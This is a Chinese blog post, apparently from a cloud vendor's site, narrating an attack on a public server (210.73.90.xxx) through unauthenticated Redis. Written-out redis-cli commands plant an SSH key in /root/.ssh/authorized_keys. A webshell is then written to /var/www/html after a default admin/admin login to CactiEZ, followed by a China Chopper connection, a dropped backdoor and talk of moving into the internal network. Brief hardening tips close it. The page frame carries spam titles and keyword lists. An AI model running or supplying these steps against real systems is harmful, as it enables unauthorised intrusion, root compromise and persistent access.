中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

利用未授權的redis寫webshell

發布時間:2020-07-11 00:37:52 來源:網絡 閱讀:2850 作者:jamesmeng10 欄目:安全技術


最近redis的話題比較多,因此就有了下面這個故事。


目標IP:210.73.90.xxx


利用漏洞:未授權的redis訪問


漏洞利用1:


1)本地生成秘鑰

root@GanDolf:~# ssh-keygen  -t rsa


利用未授權的redis寫webshell

2)將公鑰寫入一個文件

root@GanDolf:~# cd /root/.ssh/

root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3)連接redis寫入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK
root@GanDolf:~/.ssh# redis-cli  -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
saOK
(1.40s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@GanDolf:~/.ssh# ssh

4)連接服務器

root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx

發現為開啟22端口

到此此方法失敗


漏洞利用2:


nmap掃描結果:


80 443 開放


訪問80原來是CactiEZ v10版本
嘗試弱口令登錄admin admin登錄成功,發現無長傳路徑。

利用未授權的redis寫webshell


嘗試redis寫webshell

前提:網站的物理路徑

手動幾次沒爆成功


轉向挖CactiEZ v10 的一些安裝信息
于是乎,下載CactiEZ v10 自己搭建虛擬安裝,啟動找出物理路徑為:

/var/www/html


于是利用redis寫shell

利用未授權的redis寫webshell

于是菜刀連起:

利用未授權的redis寫webshell

最后丟個小碼。看看能不能挖到啥東西,后續可以反彈到本地,內容漫游下(好多交換機,主機^__^)

利用未授權的redis寫webshell

利用未授權的redis寫webshell

最后總結關于redis的安全建議:


1)修改默認端口
2)監聽本地端口
3)使用非root啟動,否則出現漏洞1,直接拿到root權限
4)修改配置文件,禁用相關命令

# rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

蓬莱市| 商城县| 阿拉尔市| 自贡市| 白城市| 江津市| 怀化市| 汝南县| 北辰区| 富川| 诸城市| 上饶市| 嘉义县| 灵武市| 澄迈县| 孙吴县| 宜良县| 沈阳市| 深圳市| 甘泉县| 尚义县| 五莲县| 衡东县| 特克斯县| 桦川县| 岳西县| 桑植县| 兴业县| 普宁市| 双桥区| 辉县市| 舟山市| 定兴县| 宁河县| 镇远县| 利辛县| 舒城县| 墨玉县| 卫辉市| 永宁县| 太原市|